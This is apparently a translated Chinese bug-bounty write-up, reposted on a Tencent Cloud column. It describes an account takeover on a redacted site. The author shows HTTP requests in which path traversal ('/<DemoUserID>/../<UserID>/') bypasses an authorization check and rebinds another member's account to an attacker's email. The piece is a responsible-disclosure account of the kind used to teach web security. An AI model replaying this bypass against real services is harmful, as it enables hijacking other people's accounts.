前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP最新优惠活动
返回腾讯云官网
社区首页 >专栏 >实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

实战 | 记一次价值 2500 美元的账户接管漏洞挖掘

作者头像
HACK学习
发布2023-01-03 18:12:49
5730
发布2023-01-03 18:12:49
举报
文章被收录于专栏:HACK学习HACK学习

价值 2500 美元的账户接管

在这篇文章中,我将分享我如何通过简单的 IDOR 绕过导致账户接管而赚取 2500 美元。

由于我不能透露该程序的名称,根据他们的披露政策,我将其称为 redacted.com。

在 redacted.com 上,您可以创建一个组织并添加该组织的成员,有两个选项可以在组织中添加成员。

首先,您可以通过使用他们的电子邮件地址邀请他们来添加成员。

其次是添加一个没有电子邮件的成员,只有成员的名字,这称为演示用户,添加演示用户后,您可以编辑它并添加一个电子邮件地址,使其成为实际用户。

使用电子邮件地址添加成员

通过提供名称添加成员(演示用户)

创建演示用户后,我添加了一个电子邮件地址,使其成为我组织中的实际用户,但是当我转到我的 Burp Suite 请求历史记录时,我注意到了这个请求

代码语言:javascript
复制
POST /<organizationID>/addEmail/<DemoUserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"attacker@email.com"
}

如果我将<DemoUserID>更改为我组织内 任何成员的UserID ,会发生什么情况?

结果如下:

代码语言:javascript
复制
HTTP/2 403 Forbidden
Date: Tue, 15 Nov 2022 14:44:25 GMT
Content-Type: application/json
Content-Length: 76
Pragma: no-cache
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff


{
  "message":"You don't have access to this.",
}

尝试了几个小时的bypass,找到了可以用的,最后bypass的规则是这样的

代码语言:javascript
复制
POST /<organizationID>/addEmail/<DemoUserID>/../<UserID>/ HTTP/2
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Token: 123abc
Content-Length: 40
Origin: https://redacted.com
Referer: https://redacted.com/

{
  "email":"attacker@email.com"
}

请求的响应

代码语言:javascript
复制
HTTP/2 200 OK
Date: Tue, 15 Nov 2022 14:43:32 GMT
Content-Type: application/json
Content-Length: 2
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
X-Content-Type-Options: nosniff

{
}

关联的 <UserID> 的电子邮件地址将更改为攻击者控制的电子邮件。

报告提交时间:

我在晚上 10 点左右发现了这个漏洞,并立即提交了报告,第二天早上,我收到了团队的回复并获得了2500美金赏金

作者:Jefferson Gonzales

来源:点击阅读原文

由HACK学习翻译整理,如需转载请注明来源

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2022-11-18,如有侵权请联系 cloudcommunity@tencent.com 删除
com

本文分享自 HACK学习呀 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

com
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
LV.
文章
0
获赞
0
目录
  • 价值 2500 美元的账户接管
  • 报告提交时间:
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2024 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2024 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论